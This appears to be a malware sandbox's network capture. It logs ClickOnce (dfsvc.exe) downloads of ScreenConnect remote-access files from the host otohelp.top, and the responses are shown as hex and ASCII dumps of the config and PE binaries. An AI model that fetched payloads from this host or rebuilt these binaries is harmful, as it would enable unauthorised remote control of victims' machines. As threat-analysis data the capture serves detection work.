                                                                                                                                                2024-10-02 04:25:25 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.64972979.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:26 UTC110OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                2024-10-02 04:25:26 UTC214INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 266
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:26 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-02 04:25:26 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                7192.168.2.64973079.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:27 UTC100OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                2024-10-02 04:25:27 UTC216INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 81696
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:26 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-02 04:25:27 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
                                                                                                                                                2024-10-02 04:25:27 UTC16384INData Raw: 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 d2 59 fd a1 c3 db f8 b2 a8 38 41 41 b5 70 2f b9 70 e0 44 04 4a 6f 16 7f 54 f3 2d 91 6d bf ac 66 21 46 ef be d1 1e 85 dd 2b 75 b8 ff 7a 0d c8 39 d0 7b 2a 86 54 8d 79 d9 5d b2 8a 3c 12 a6 c1 3c 94 5c c5 c2 54 9b e5 b0 38 01 34 d6 47 4a 0b 62 7d 82 0a bc 8e 63 9f ae dc 13 7e 39 98 c7 b5 f2 fd 11 5b 4c 23 82 a4 fd 40 df 22 18 d8 3f 0b 56 59 b3 b5 88 4c 17 d4 e9 59 bc f3 d5 72 d6 78 1b 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34
                                                                                                                                                Data Ascii: -452b-8975-74a85828d354TextStateY8AAp/pDJoT-mf!F+uz9{*Ty]<<\T84GJb}c~9[L#@"?VYLYrx{^@RSDSL[M9iHF4
                                                                                                                                                2024-10-02 04:25:27 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff
                                                                                                                                                Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
                                                                                                                                                2024-10-02 04:25:27 UTC16384INData Raw: 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00
                                                                                                                                                Data Ascii: fffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
                                                                                                                                                2024-10-02 04:25:27 UTC16376INData Raw: 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: n


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                8192.168.2.64973179.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:28 UTC88OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                2024-10-02 04:25:28 UTC217INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 197120
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:28 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-02 04:25:28 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
                                                                                                                                                2024-10-02 04:25:28 UTC16384INData Raw: 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a
                                                                                                                                                Data Ascii: &rYpov&(, ow&}ow&o)**.(*&(**^uw,w(***0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^ux,x(***0@su
                                                                                                                                                2024-10-02 04:25:28 UTC16384INData Raw: 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc
                                                                                                                                                Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
                                                                                                                                                2024-10-02 04:25:29 UTC16384INData Raw: 01 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f
                                                                                                                                                Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
                                                                                                                                                2024-10-02 04:25:29 UTC16384INData Raw: b2 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00
                                                                                                                                                Data Ascii: *+{>+Bd+/q+PX!*++j,f f,f f: ,t',x)*f2vV
                                                                                                                                                2024-10-02 04:25:29 UTC16384INData Raw: 1c 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15
                                                                                                                                                Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkk
                                                                                                                                                2024-10-02 04:25:29 UTC16384INData Raw: 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74
                                                                                                                                                Data Ascii: RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadat
                                                                                                                                                2024-10-02 04:25:29 UTC16384INData Raw: 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76
                                                                                                                                                Data Ascii: kMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceiv
                                                                                                                                                2024-10-02 04:25:29 UTC16384INData Raw: 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00
                                                                                                                                                Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVol
                                                                                                                                                2024-10-02 04:25:29 UTC16384INData Raw: 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06
                                                                                                                                                Data Ascii: rtMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                9192.168.2.64973479.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:30 UTC95OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                2024-10-02 04:25:30 UTC216INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 68096
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:30 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-02 04:25:30 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
                                                                                                                                                2024-10-02 04:25:30 UTC16384INData Raw: 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00
                                                                                                                                                Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,o*e4g(*V{To#o(*(*J{Vo)(**(*0C
